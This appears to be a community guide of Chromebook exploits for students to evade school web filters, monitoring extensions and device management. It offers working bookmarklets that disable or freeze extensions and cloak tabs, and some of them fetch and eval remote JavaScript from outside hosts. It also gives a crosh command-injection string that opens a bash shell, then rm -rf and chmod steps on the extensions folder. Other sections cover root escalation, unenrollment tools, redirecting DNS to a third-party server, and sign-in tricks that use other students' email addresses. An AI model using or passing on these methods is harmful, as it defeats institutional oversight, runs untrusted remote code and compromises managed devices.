Kajigs

A repository of methods you can employ enabling you to bypass restrictions!

PLEASE DO NOT USE KAJIGS FOR ILLEGAL ACTIVITY

Limitations: Methods which are considered aggressive such as removing or damaging devices (e.g removing Enterprise Enrollment) are not allowed.

For quality purposes, only Featured kajigs will be listed here.

Current Tags:

Prevent Tab Close (GoGuardian, etc.)

This is a really old exploit that originates all the way back to 2017/2018. Essentially it prevents your tab from being closed in the most simple way. Use as needed.

javascript: onbeforeunload = (i) => 1;

Paste the above in a bookmark and run it on whatever tab you want to prevent force closing!

Tab Disguise

Disguises the icon and name of the tab you're on with the icon and name given in the code

Setup: Create a bookmark, copy the provided code and paste it in as the URL (name it whatever you want).

javascript: (function () {
  var link =
    document.querySelector("link[rel*='icon']") ||
    document.createElement("link");
  link.type = "image/x-icon";
  link.rel = "shortcut icon";
  link.href =
    "https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_5.ico";
  document.title = "My Drive - Google Drive";
  console.log(document.title);
  document.getElementsByTagName("head")[0].appendChild(link);
})();

Alternatively, you can use this code to update the disguise every second (same setup)

javascript: function gcloak() {
  var link =
    document.querySelector("link[rel*='icon']") ||
    document.createElement("link");
  link.type = "image/x-icon";
  link.rel = "shortcut icon";
  link.href =
    "https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_5.ico";
  document.title = "My Drive - Google Drive";
  console.log(document.title);
  document.getElementsByTagName("head")[0].appendChild(link);
}
gcloak();
setInterval(gcloak, 1000);

The 2 scripts given use a Google Drive disguise as an example, but they can be customized

Porta Proxy (Hapara)

Allows you to access a given site within other tabs; bypasses Hapara

Setup: Create a bookmark, copy the provided code and paste it in as the URL (name it whatever you want).

javascript:((function(){
var a,b,c;c="WEBSITE HERE",
b=document.createElement("iframe"),
b.setAttribute("src",c),b.setAttribute("id","rusic-modal"),
b.setAttribute("style","position: fixed; width: 100%; height: 100%; top: 0; left: 0; right: 0; bottom: 0; z-index: 99999999999; background-color: #fff;"),
a=document.getElementsByTagName("body")[0],
a.appendChild(b)})).call(this)

To close the Porta Proxy, create another bookmark with this code:

javascript: var element = document.getElementById("rusic-modal"); element.parentNode.removeChild(element);

In order to use Porta-Proxy, you must supply your own proxy website link in the bookmarklet; you put the link inside the quotation marks that read "WEBSITE HERE", and you have to include https://

Permanently Remove Extensions (Past v106)

Credits: CoolElectronics

This exploit is currently the most flexible and effective method in TN right now as a result of the bounty made by luphoria. Criteria was to simply bypass the Enterprise Policy ArcEnabled: false but resulted in a much more effective exploit in the end.

This exploit details another way to permanently delete extensions. Once done, you can update or restart your chromebook and the extensions will stay gone until you powerwash.

You need a usb for downgrading, and rudimentary knowledge of bash is recommended.

STEPS:

Downgrade to any version below 103. Instructions are in "Chrome100 - Downgrade your Chrome OS".

Hit ctrl alt t to open a crosh window. If it’s blocked by extensions, use LTBEEF. If it’s policy blocked (“The person who set up this computer has chosen to block this site”) you can try downgrading to a version below 90, where crosh had a different URL Type in set_cellular_ppp \';bash;exit;\' and hit enter.

You now have access to a bash shell, logged in as chronos. More information about the permissions of this shell is at the bottom.

Type rm -rf ~/Extensions/*. THIS WILL BREAK EVERY EXTENSION ON YOUR CHROMEBOOK. If there are extensions you want to keep, they can be selectively removed by ID.

Run chmod 000 ~/Extensions. This marks the extension folder as read only, stopping it from updating in the future or any new extensions from being installed.

You can now restart chrome, allowing it to update to the latest version. Once rebooted onto the latest version, all removed extensions will have the default icon and won’t function at all

If you would like Root Access, go to Root Escalation

You can also run set_cellular_ppp \'chmod 777 ~/Extensions;rm -rf ~/Extensions;mkdir ~/Extensions;chmod 000 ~/Extensions;echo done;exit\' in crosh to do it all in one step

https://discord.com/channels/419123358698045453/1033121753263771709

Root Escalation

Have the ability to run developer mode content, enable developer mode, bypass pretty much everything with one exploit. Will require the downgrade methods.

Has so many branches that I’m just going to link the Kajig discussion. Check the pins in the TN Discord server.

https://discord.com/channels/419123358698045453/1033537020854800434

[swamp] FOR GOGUARDIAN ONLY:

Functions like LTBEEF, the GUI based exploit which Bypassi originally lead for disabling extensions. However unlike the Bypassi based exploit, swamp still remains unpatched on versions post v102 up to even v107.

This will allow you to:

https://discord.com/channels/419123358698045453/1040775494406250548

KIOSK Exploit (DE-LICENSED) (Original):

Although many variations of this exploit exist, this was the very original implementation of it. However, the process never went as far or flexible as a full Chrome browser window being able to be created out of this method rather than just a simple bypass within the KIOSK app.

Credits to B3AT and Divide for this exploit.

This exploit allows you to open an unrestricted Chrome instance within a kiosk app, i.e. with the kiosk user account permissions.

Steps:

Note: The exploit should work consistently v76 or below but it's still possible to pull off on v85 or below, but only once (right after you powerwash).

UserPolicy Bypass:

This should enable ARC (Play Store) and unblock all policy blocked URLs.

When you connect to a wifi without the custom DNS the policy will reload to normal but some changes will persist, more testing is needed. This is useful because most root exploits require ARC in some form.

You need:

Steps:

[EXTRAS]: personalDNSfilter and hotspot or DNS Sinkhole + Hotspot on iOS can be used; NextDNS

Results should prompt you about a PIN and Google Play then drop you into an account where everything works as normal but no user policies are set. If you get a "sign in required" error, try steps again.

https://discord.com/channels/419123358698045453/1040639727595950180

LTBEEF - Disable ANY Extension

LTBEEF is an incredibly powerful exploit which can be utilized to disable any extension, including GoGuardian, Securly, Lightspeed, ....

Credits to Bypassi and CompactCow.

Bookmarklets

Option A - GUI Based

javascript: fetch("https://compactcow.com/ltbeef/exploit.js").then((data) => {
  data.text().then((text) => {
    eval(text);
  });
});

Click it once (not on a new tab) to get to the correct webstore page, then again to open the UX.

Option B - if Option A doesn't load

javascript: prompt("Extension IDs here: (seperated by commas)")
  .split(",")
  .forEach((i) => {
    chrome.management.setEnabled(i.trim(), !1);
  });

If bookmarklets are disabled:

History Deletion #2 (v106+)

IMPORTANT NOTE: THIS WILL WIPE ALL SYNCED DATA, NOT JUST HISTORY

SYNC DATA INCLUDES APPS, NON-MANAGED EXTENSIONS, BOOKMARKS, AND MORE

Downgrade your Chrome OS (Chrome100)

This provides a basic tool required for many exploits as a prerequisite.

Chrome100 is a website which enables you to download old versions of Chrome OS for your Chromebook. Old versions may have vulnerabilities which are now patched; thus, these old Chrome OS images are essential for many exploits!

https://chrome100.dev

Maintained by Divide

Ingot Extension Removal (DNS)

CREDIT TO COMPACTCOW AND NEBELUNG AND BYPASSI

Unblocked DevTools/Flags (ADVANCED)

This is a guide on how to use chrome launch options and a thread for discussing exploits related to the bash shell. I have been requested to make this several times

First of all, you will need some knowledge of bash, and you must know how to use vi.

This builds off of Permanently Remove Extensions (past v106).

Follow the instructions there, and stop once you have the bash shell.

Now you can add whatever launch options you want! these are like the flags in chrome:flags, but there are way more available.

The full list is here: https://peter.sh/experiments/chromium-command-line-switches/

Some notable ones are: --force-devtools-available (devtools), --bwsi (guest mode), --kiosk(useless but funny), --oauth-client-id(breaks policy updating and profile syncing), --disable-extensions-except, --show-login-dev-overlay/--show-oobe-dev-overlay, --enable-hangout-services-extension-for-testing(adds a bunch of useless extensions), and more.

To execute chrome with the launch options set, exit vi (impossible), and run sh <(cat exploit.sh) & disown

IStealYourDNS (DNS)

IStealYourDNS is a TitaniumNetwork-partnered service. With it, you can seamlessly block many web filters (GoGuardian, Lightspeed, ...) and never think about bypassing filters ever again.

Installation

To install it, simply open your Wi-Fi's DNS settings, and set the name servers to "Custom" - replace any options available with 72.5.33.65. If you have multiple boxes, set the last one to 1.1.1.1.

Then, simply restart and you're done!

Better DNS Bypass (DNS)

ONC: https://cdn.discordapp.com/attachments/1042601318105239562/1042928899371323402/bypass.onc

Get Proton VPN on Chromebooks

https://account.protonvpn.com/signup

   ,
          "Username": "(Put your username here)",
          "Password": "(Put your password here)"

You can just copy and paste it and you'll get the right formatting.

Make sure that you start the paste right after the end quotation mark.

Incognito Exploit (v81)

This is the first Licensed exploit to be declassified as a Kajig!

This still needs to be improved.

Make sure to downgrade to chrome OS v81 or lower first: "Chrome100 - Downgrade your Chrome OS"

Steps to the Incognito Exploit, summarized

(Steps before include getting on the login screen to the part where you are signing in as a new user. Enter your email and password but don't login. Do Alt + Shift + I. Continue to Step 1 where you spam "Privacy Policy".)

Benefits:

Possible Errors (you may encounter):

The following exploit is still a massive WIP and the following above may be subject to change or expand.

Process End Method

If Task Manager is blocked:

personalDNSfilter/Hotspot

https://f-droid.org/en/packages/dnsfilter.android/

DNS Servers:

Extras

You may need to update the DNS servers on your current phone WIFI network.

Stealth (Lightspeed)

This trick is specifically for when your chromebook is "locked" by a teacher, and any site you go to will get closed instantly. It can also hide the tab from the teachers and get around the "[teacher's name] has blocked this site" screen.

The way it works is by letting you put an iframe inside of the new tab window, where most chrome extensions don't have permission. This means that if a page is "temporarily blocked" by a teacher or they lock your chromebook you can still access almost every page that works in an iframe. I don't know what it shows up as on the teacher screen, but they likely will just see the new tab and not the actual site.

Use this bookmarklet:

javascript:document.write(`<style> iframe{margin:0px; border:none; padding:0px; outline:none} body{margin:0px}</style><iframe src = "${prompt("enter url")}" width = ${window.innerWidth} height = ${window.innerHeight} />`)

Enter a url that you want to visit.

Notes:

Playstore Bypass (v106+)

Make sure you are upgrading or powerwashing/recovering. Chrome Device Manager's notification should appear otherwise this will not work.

MAKE SURE TO HAVE A HOME ACCOUNT ADDED!

Add accounts in settings -> your school account name -> add account. You don't need to go to Android settings and shouldn't!

EASIER GUIDE After Powerwash, Recovering, removing account and adding it back in:

GoGuardian Discord Unblock

This only works for Discord and Youtube.

Type 1

data:text/html,<script>window.location.href='https://discord.com/app?%27+%27e%27.repeat(16380)%3C/script%3E

Open this in a new tab.

Type 2

Bookmark and open this in a new tab.

javascript:window.open('https://discord.com/app?'+'e'.repeat(16384));

killcurly (Securly, v107+):

RIP Cookie Dough to leaking. Regardless here is another exploit related to bypassing Securly.

Windows Laptop Tutorial

https://learn.microsoft.com/en-us/training/modules/implement-common-integration-features-finance-ops/10-exercise-1

Not everything is unbl0cked; some things will still be blocked. Either figure out how to install a VPN on Microsoft Edge or deal with it :/ If you see ERR_SSL_PROTOCOL_ERROR it probably means that you were blocked.

For the first time, you will need to sign up. After that, everything should be simple.

Signing Up

Sign in to launch VM mode

  1. Press that
  2. Sign in with your school email
  3. Microsoft will ask you a few questions. Just choose anything, it doesn't matter much.
  4. Finish sign up
  5. You might see a captcha. Complete it, and if it doesn't complete, just refresh.
  6. Captcha should be gone and you see a button that says "Launch VM mode" in the same place where it said "Sign in to launch VM mode"

Starting the Windows laptop

VM

  1. Press "Launch VM mode" button
  2. You should see what the image above shows
  3. The password is exactly pass@word1
  4. Open the Edge Browser!

Getting a VPN - fully unbl-ck the browser

  1. In the laptop in Edge, search up "Edge Addons"
  2. In Edge Addons, search for "free VPN"
  3. Find a VPN and get/install the extension
  4. Press the puzzle piece at the top, and press the eye next to the extension you downloaded
  5. Press on the new icon that appears at the top, and then figure out what you have to do to get the VPN working. The VPN might not work, so just installing a different one.
  6. Use the VPN. Some stuff might be slower but the browser will be unbl0cked.

Later I might make a tutorial on fully unbl0cked Linux (like Windows) + Chrome which doesn't need a VPN and might be faster.

LOGINpass

There are 3 ways to do this. The first one probably will be hard to block. The second will be easy to block, if you know how to do it. The third is essentially the same as the first one but with a different route. The first and third require you to know the email of another person in the IPSD district.

Important:

let warning = "The top and bottom of the site is chopped off. The bottom can be fixed by going fullscreen. The top will always be chopped off though. That is why this exploit might be annoying."

Also, remember that you can use the arrow keys on your keyboard to go back and forward pages.

Method 1

If you didn't see the start, just note that you need the IPSD email of someone else (you don't need the password or anything else). If you don't have this or want to do it faster, use Method 2. Method 1 will be unblocked for a long time (I think).

  1. Go to chrome://chrome-signin
  2. Put in the IPSD email
  3. Press "Students: I Forgot My Password"
  4. Press the blue "Click here"
  5. Click on the link in the first step in the website (says "Parent will visit ParentVUE at" and the link)
  6. Scroll and press "Android App"
  7. At the very top right you will see a little thingy that looks like that, click it and type "Google"
    Search thing
  8. Choose the first one
  9. Go to the "Data safety" section and press on "See details"
  10. Scroll to the very bottom and click on privacy policy
  11. Scroll to the very bottom and press "Google"

You are done. Now you are in Google. The only benefit of this method is that it's not gonna be blocked for some time.

Method 2

  1. Go to chrome://chrome-signin
  2. Put in "google@d11.org"
  3. Press "Sign-in options"
  4. Press "Sign in with GitHub"
  5. Press "Forgot password?" (YOU NEED TO DO THIS)
  6. Press the GitHub cat at the top.
  7. Press the search thing (top right) and type in doxrjig and press the first thing that comes up.

You are done. Press on any of the links or if you have a specific link you need to get to, use the specific site switcher (don't forget https:// in front of the URL)

Method 3 (shortest to perform, best)

  1. Go to chrome://chrome-signin
  2. Type in someone else's email, ex. Yifanba9524@k12.ipsd.org
  3. When it takes you to the log-in page, type in YOUR credentials
  4. After pressing enter on the password, it should return you to a 404 page, click the google logo, it should take you to a google page.
  5. This is the unblocked browser. Profit =)

IPSD-pass

This method uses a few links in IPSD's login screen to get to a different page unblocked.

This bypass isn't very good since you can't use the arrow keys to go back and forward in pages, and some sites like Snapchat are still blocked, but that literally can't be bypassed.

Steps:

  1. Log out
  2. You should see "add a new user" on the bottom left, click on that.
  3. In the login screen, press "Students: I Forgot My Password"
  4. Click the blue "Click here" in the sentence that says Click here for step-by-step instructions on using this form.
  5. You will find a sentence that says Parent will visit ParentVUE at https://il-ipsd-psv.edupoint.com/PXP2_Login_Parent.aspx and log in with their ParentVUE username/password., click on the link (should bring you to StudentVUE)
  6. Press "iPhone App"
  7. Press on the search button (top right) and type in "DuckDuckGo," you'll find a thing that says "DuckDuckGo Private Browser," click on it.
  8. You'll find a section that says "App Privacy," and in that you'll find a link that says "For more information, see the developer’s privacy policy." Click on it
  9. You'll find an icon on the top left, click on it

Now you are done. Use DDG like how you use Google, but remember that once you click on a site you can't go back because this exploit is bad.

Evil Printer Un‌blocking

This method can unblock your chromebook, and all it takes is printing.


The only problem with this is that there will be a little bit of lag while this is running. This exploit may randomly stop working, just do the entire thing again.

  1. DON'T CLICK ON THIS LINK (it won't work). Instead, drag this link to your tabs, and a lot of code should pop up.

Link: Drag me!

Ex:

  1. Press CTRL+P to bring up the printing page. Set pages to "All" and Layout to "Landscape." Also, copy these settings down below as well. This will create a lot of lag, and you won't be able to open sites right now.

Make sure that you copied all of those settings.

  1. Press the refresh button on your chromebook's keyboard (don't close that printing screen), then do ALT + D and ALT + Enter. There should be a new tab that opens; don't close this tab! Going on that tab is a bad idea too since it can lag you.

  2. Copy this URL, open a new tab, and paste it in the same place you would paste a normal URL in.

chrome://extensions/?id=adkcpkpghahmbopkjchobieckeoaoeem

  1. Scroll down until you see Allow access to file URLs and flip the switch thing next to it, and then do it again so the switch isn't blue anymore.

  2. If you did everything correctly, the old page closed but the new page is still open and it is still loading. Now your chromebook should be unblocked. You will feel a bit of lag but that's it. If you want to stop the exploit and go back to normal without lag, just enter chrome://restart in the place where you type URLs, and your chromebook will immediately restart.

LTVegan

Hang the blocker and be unblocked.

  1. Open chrome://extensions/?id=adkcpkpghahmbopkjchobieckeoaoeem (tab 1)
  2. Open chrome-extension://adkcpkpghahmbopkjchobieckeoaoeem/main.js in a new tab (tab 2)
  3. Go to tab 2 and do CTRL + A to copy all of the code on the site.
  4. Drag the code to the top (this might do a google search with all of the code, that's fine). The chromebook will freeze for a little bit.
  5. Right-click on tab 1 once you stop freezing and press the duplicate button.
  6. Go to tab 2 and press the switch that says "Allow access to file URLs" (multiple times). One of the tabs that were duplicated will close, the other won't. DON'T CLOSE THE TAB THATS LOADING.
  7. close the google tab, and close tab 1, and you should be unblocked!

If BOTH tabs of tab 2 (the original and duplicated) close, you did something wrong probably. Just try again or something. (Unless it's patched lol)

CryptoSmite Unenrollment

CryptoSmite is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by FWSmasher and released on March 9th, 2024.

This exploit has been patched since Chrome OS 120.

Finding Kernver

If you're on v120 or higher, you need to downgrade in order to use CryptoSmite. To do this, you first need to check your kernver= in Recovery Mode.

  1. Boot into Recovery Mode
  2. Press TAB and look at the last digit of the kernver= line

Using CryptoSmite

  1. Download a SH1MMER Prebuilt image here: dl.darkn.bio
  2. Disable OS verification (blocked or not, doesn't matter), and boot into the shim.
  3. Navigate to Payloads and navigate to CryptoSmite using the arrow keys, then press Enter.
  4. Type in Y then press enter, and it'll automatically reboot upon completion.
  5. Proceed through the setup partially till you get to the Add Account Screen.
  6. Powerwash the Chromebook at the "Add Account" screen. Afterwards, it'll be fully unenrolled.

Further Reading

SH1MMER Unenrollment

SH1MMER is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by the Mercury Workshop team and was released on January, Friday the 13th, 2023.

Due to the detail this exploit requires, please check out the offical website: sh1mmer.me

This exploit has been patched since Chrome OS 111.

Note

Mercury Workshop received a notice from Google™️ that they had to take down their builder and shims. Currently, it is being rehosted by multiple community members.

Further Reading

Hapara Focus Session Bypass

What is it?

An exploit that allows for access to sites outside of the Hapara Focus Session

How to use it?

You teacher may be able to still see your screen, but they won't think you are doing anything wrong because of the focus session.

YOU MUST NEED data: LINKS ALLOWED, IF YOU DON'T HAVE THOSE ALLOWED, THIS WILL NOT WORK.

  1. create a bookmark named anything, head to the URL section, and paste this in it: data:text/html,<!DOCTYPE html> <html> <head> <title>full screen iframe</title> <style type="text/css"> html { overflow: auto; } html, body, div, iframe { margin: 0px; padding: 0px; height: 100%; border: none; } iframe { display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden; } </style> </head> <body> <iframe src="https://www.google.com.au" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto" id="google"> </iframe> </body> </html>
  2. when you are in a focus session, click the bookmark, and it will open a google tab. (If it says that it doesn't work, then you can download the Iframe
  3. enjoy not having to listen to a lecture from your teacher! (Credit to Hero Link 6 For finding this exploit, you can find more info on his GitHub repository here.)

GuardianTabCrash Unrestricted browsing

What is it?

An exploit that allows for unrestricted internet access outside of goguardian's control

How to use it?

Teacher's can still see your screen, but they can't block or close any of your tabs.

YOUR TEACHER NEEDS TO HAVE SET A TAB LIMIT. TRY OPENING TONS OF TABS TO CONVINCE THEM TO ENABLE TAB LIMITS.

  1. create a bookmark named anything: javascript: window.onbeforeunload = ()=>{return false;}
  2. Hold down CTRL and then SPAM CLICK the bookmark until you're well above the tab limit, opening a bunch of about:blank pages.
  3. It might ask if you want to leave this page, this is goguardian trying to close it. Say No, and click Prevent from creating additional dialogues.
  4. Enjoy your unblocked stay!

Discovered by @py660

Skiovox Unrestricted browsing

What is it?

An exploit that allows for browsing within a completely unblocked Chrome browser. It works on ChromeOS 118 and a wide range of previous versions.

How to use it

Bypassi made a wonderful slideshow for you goofballs to follow and view using any of the links below!

Further Reading

LTBEEF Disable extensions

LTBEEF (Literally The Best Exploit Ever Found) is an exploit found by Bypassi (Bypassi#7037) in September 2022 and is a great way to disable spyware installed on your Chromebook by your school.

How to use LTBEEF

Use either of the two bookmarklets below. The instructions are the same for both.

  1. Copy the Javascript code from either of the two bookmarklets below
  2. Make a new bookmark on your Chromebook
  3. Put the Javascript code in the URL section of the bookmark
  4. Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
  5. If that page does not work, you can just change the end of the URL to anything else, like https://chrome.google.com/webstoreYAAAAAAAAAAAAAAAY
  6. Click on the bookmark you made
  7. Switch off the extensions you don't want to have anymore.
  8. You're done! The extension should now be disabled.

Please note that this exploit has been patched for quite some time

Bookmarklets

CompactCow GUI

compactcowgui

javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});

Ingot

ingot

javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())

LoMoH Disable extensions

Formerly named "Locked Mode Hack," this Chrome OS exploit uses the locked mode feature to soft disable force-enabled extensions on managed accounts (Excluding Hapara Highlights and Read&Write if installed).

This exploit is patched in Chrome OS 111

Bookmarklet Version (Original and nicer)

javascript:(function(){if (location.hostname == "docs.google.com") {document.body.innerHTML = document.body.innerHTML.replace("Locked mode is on", "Are you ready to turn off extensions?%22);%20document.body.innerHTML%20=%20document.body.innerHTML.replace(%22You%20have%20already%20opened%20and%20closed%20this%20quiz.%20Opening%20this%20quiz%20again%20will%20notify%20the%20form%20owner%20by%20email.%22,%20%22This%20will%20reload%20all%20tabs%20in%20your%20browser%22);%20var%20button%20=%20document.getElementById(%27mG61Hd%27);%20button.innerHTML%20=%20button.innerHTML.replace(%22Start%20Quiz%22,%20%22Disable%20Extensions%22);%20button.addEventListener(%27click%27,%20function(event){window.close();})}%20else%20{window.open(%22https://docs.google.com/forms/u/0/d/e/1FAIpQLSf5EYwrSUjmQhBOasMpORZy80eBCYb7qCpEwWNoRPUGyObGMA/startquiz%22);}})()

Website/HTML Version (for blocked bookmarklets)

LoMoH HTML Additional Notes: You must create your link with the button on the page for locked mode to work within your organization/district. If this is patched for you, you will get rickrolled attempting to perform this exploit. This is just a heads-up for those who do happen to read this.

GitHub Repository

LTMEAT Disable extensions

Literally The Meatiest Exploit of All Time

  1. Find a page belonging to the extension you want to disable. chrome://extensions, chrome://extensions-internals, and chrome://process-internals are all good places to find your extension's ID (a 32-character lowercase string). You can also do a simple Google search. Once you have your ID, substitute it into the hostname in the URL below:
chrome-extension://extensionidhereblahblah/manifest.json

For some filters like Securly, the block screen is already an extension page.

  1. Bookmark the extension page (bookmark A) if you wish. Then, bookmark chrome://kill (B) and chrome://hang (C).
  2. On the extension page (A), click the chrome://kill bookmark (B). The page should crash. You should already have the next step prepared.
  3. Instantly start spamming chrome://hang (bookmark C) and quickly reload the page while spamming (ideally with the refresh key on your keyboard or ctrl+R). You should have reloaded within one or two seconds of killing the page.
  4. If the extension page (bookmark A) no longer loads, then LTMEAT worked! You can close your tabs, and the extension will be dead. If nothing loads, you probably reloaded too late or spammed too slowly. This isn't rocket science! Restart your computer to revert back to normal.

Exploit made by Bypassi#7037, learn why this works.

"Help me! I'm an idiot!"

I had far too much faith in society when making this page. Some of you skids out there are really, really stupid and also can't read. So here are the answers to some commonly asked questions.

How do I get an extension ID?

Okay, fair. Extension IDs are leaked in a couple of places. Generally, the best way to get them is to go to extension settings and copy the URL query value.

It says blocked by client?

That's the message you get when you try to visit a page belonging to an extension that doesn't exist. The error message (ERR_BLOCKED_BY_CLIENT) is highly misleading. Nobody blocked it. You need to find the correct extension ID (see above).

If you got this because you tried to visit the extension_id_here example URL, you should be extremely ashamed of yourself. Please change and grow as a person.

I don't have a bookmarks bar!!!!

First, try running ctrl+shift+B. If that doesn't work, go to chrome://settings and turn on the "home button" feature, then set it to chrome://hang. A home icon in the top left should appear to the right of your refresh icon. Use that instead of bookmark C.

There is a version where you don't need bookmarklets, but I am currently gatekeeping it (L). Check this site daily to see if new alternate instructions have been posted.

I disabled an extension, but now I can't load websites!

If you just read the write-up, you'd know this would happen if the extension's background page loaded and its listeners were already initialized before you used chrome://hang. You can double-check whether the extension is listening using chrome://extensions-internals, assuming you have a few brain cells in your head.

Anyway, no listeners mean you were too slow. Either you waited more than three seconds between bookmark B and reloading the page, or you needed to be spamming bookmark C faster. The most reliable fix is to restart your computer and try again. Try to match the pace of the gif below: (note the reload)

image

The bookmarks don't do anything when I click them!

Might be admin-blocked. Either be smart enough to figure out another way or check this site daily to see if new alternate instructions have been posted.

I disabled the extension. Why is some stuff still blocked?

I have bad news for you... not all filters are Chrome Extensions. Again, make sure the extension pages (like bookmark A) are frozen before you assume that your skiddy self successfully did the exploit.

Baby method for slow people

LTMEAT Flood Freeze extensions

  1. Create a bookmark folder and paste the extension page many times. (About 800 minimum is recommended, assuming your Chromebook is average school quality) You should add the extension page at the beginning of the folder.
  2. Right-click and open all in a new window.
  3. Close the window with all those tabs.
  4. Open the folder in a new window again, and Chrome should hang those tabs to take care of the old ones in the background that were just closed. (Equivalent to the duplicate tab step in Bypassi's method)
  5. Flip the Allow access to file URLs switch in the extension settings, and then you've bypassed the patch, and the exploit is working.

Close everything and you're good to go. If it didn't work, try adjusting the number of open tabs. This is the LTMEAT Flood Method, and also unofficially called Alternate Method # 2. Enjoy a much longer life of LTMEAT!

Not working? Ensure you open a large set, but not too large, of extension tabs (_/generated_background_page.html or /manifest.json) for a permanent freeze.

Temp TMEAT Freeze extensions

A method of using LTMEAT that does not require chrome:// URLs. This works by using 80-150 tabs to soak up memory.

  1. Create a bookmark with the link chrome://extensions/?id=extension_id_here and name it Kill switch.
  2. Create a new bookmark folder. Name it spam.js. Next, paste this link into your browser: chrome-extension://extension_id_here/background.js
  3. Then right-click on your folder and hit Add Page. Press Enter.
  4. Right-click on the folder again and hit Bookmark Manager. You should see your page. Click on it and hit Ctrl+C. Press Ctrl+V until you have 38 of them.
  5. Go to a new tab and right-click your folder. Press Open All (38).
  6. Repeat step 3, then click on one of the tabs from this batch. Wait until the This page is taking too long popup appears. This will take 30-60 seconds. If it doesn’t, do chrome://restart and go back to step 2. Add 3-4 more pages to the folder.
  7. Once the popup happens, right-click on one of the tabs closest to the right of the screen and hit Duplicate. Then, go to your Kill switch bookmark and look for a switch to flip, Allow Access to File:// urls. Then, click on the leftmost extension tab (one that opened from the main.js folder) and click Close all tabs to the right. KEEP THIS TAB OPEN!!!

Tips: Go to chrome://settings/performance and turn Memory Saver off, and in the box where it says Keep these sites always active, paste in the extension URL. I’ve noticed clicking on one of the tabs from the second batch seems to help with reliability.

Baby LTMEAT Freeze extensions

BABY METHOD FOR THE TECHNOLOGICALLY CHALLENGED.

  1. Follow step one of the original instructions to find a page belonging to the Chrome extension you want to disable.
  2. Visit that chrome-extension://extension_id_here page, then type chrome://hang in the URL bar of that tab. It should start loading infinitely.
  3. Right-click the tab and duplicate it. Don't close anything.
  4. Go to the chrome://extensions page for the blocker extension you want to Disable.
  5. If that page has any switch, such as Allow access to file URLs, click that switch. If you don't see any clickable switches, this exploit will not work
  6. The extension should now be broken, assuming you clicked the switch! Only one of the two duplicate tabs should be left standing. You can close your tabs now.

LTMEAT Print Freeze extensions

  1. Find your extension's largest file. This can usually be found by using Rob Wu's crxviewer
  2. Go to that page and run Ctrl+P. A print window should show up, with several pages in the top right.
  3. Do everything you can to increase that number. Shrink down margins, change layout to landscape, anything you can. The higher you get that number, the longer the effect will last.
  4. Reload. The page should start hanging.
  5. Go to your extension's settings page, chrome://extensions.
  6. Duplicate your "printing" tab, and go back to your extension's settings page.
  7. Flip any switch you can find there. Usually, there'll be one titled Allow access to file URLs.

Where do I find my extension's manifest.json?

First, find your extension's ID. This is a 32-character code found on your extension's settings page, normally near or at the top.

Where do I find my extension ID

Then go to chrome-extension://extension_id_here/manifest.json

Credit to Bypassi for the original LTMEAT framework, and to Swordmaster4321 for discovering that pages can be hung with printing.

Dextensify Freeze extensions

Dextensify is an exploit that lets you disable most admin-installed Chrome extensions from any webpage. It can be used from regular websites, HTML files, and data URLs.

Go here and follow instructions: Dextensify Main HTML, or download the file here Dextensify.html

Download mirror: ftp.3kh0.net

Made by ading2210

JPCMG LTBEEF w/ Service workers

Requirements

  1. Go to chrome://serviceworker-internals
  2. Find your extension, this exploit will not work if you can't find it. Some extensions will not work with this exploit.
  3. Hit the start button then the Inspect button, and execute the LTBEEF code
chrome.management.setEnabled('extension_id_here',false)

Screenshot example

Thanks to Nyaann#3881 for this exploit

Corkey Corrupt extensions

Corkey does indeed include power washing the Chromebook, which wipes local data including everything under "My files," so I suggest you select everything you want to drag and back up to Google Drive if that's available for your account.

  1. Esc+Refresh+Power and re-enroll (Enter recovery page), or you can just powerwash.
  2. Log into your Chromebook and immediately turn off WiFi and do refresh+power to (instant restart)
  3. Log back into your Chromebook with the WiFi off. Look for an option to log in as an existing user and click that.
  4. Go to chrome://extensions, turn on WiFi, and wait for your school's blocking extension to appear.
  5. As soon as it appears, turn off WiFi and restart as fast as possible.
  6. Log back in, go back to extensions, and wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked (wait at least a minute with a close watch in case it comes back)
  7. If it didn't work, start over. You have to be fast.

Extension Launcher Install extensions w/o allowlist

A bookmarklet capable of installing extensions, for those without an allowlist.

Requirements

  1. Access to the Chrome Web Store
  2. A Chromebook without allowlist
  3. Bookmarklets enabled

Instructions

  1. Go to ext-launcher-bookmarklet.js and save the code as a bookmarklet.
  2. Go to The Chrome Webstore and use the bookmarklet
  3. Then put the icon of the extension, the ID, and the name of it (This does not matter, you can put anything), then press download, and it will work.

Extra Notes

Point-Blank Execute scripts on extension pages

This exploit allows you to execute scripts on extension pages, this is a great example of how Chromebooks are a piece of garbage.

Requirements

  1. Bookmarklets enabled
  2. Access to a working brain

Getting started

  1. Go to newpointblank.js and save the code as a bookmarklet on your Chromebook.
  2. Now find your blocker from the list below.

Blockers

Securly

Go to this page

If it says blocked by Chrome, reload (you have to actually have Securly ofc)

iBoss

Go to this page

Cisco Umbrella

Go to this page

Blocksi

Go to this page

GoGuardian

Go to this page

If your school updated GoGuardian, this exploit may not work.

Extra Notes

UBoss Tamper with IBoss

This works only for iBoss, and Blocksi, If you don't have one of these, use New Point Blank.

Requirements

Getting started

  1. Go to the corresponding link for your blocker below.

iBoss: tinyurl.com/byeswamp

Blocksi: tinyurl.com/blockboss

Then bookmark the code below:

javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
  1. Then go to the site with your blocker that was listed above.
  2. Run the code. Follow the instructions there.

If it doesn't work let us know by creating a discussion, this was made in partnership with akabutnice and bypassi.

CAUB Prevent Updates

This exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your Chromebook that the WiFi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.

Requirements

Getting started

  1. Go to chrome://network#state.
  2. Scroll to the bottom of the page. You will see a list of WiFi that you have connected to before.
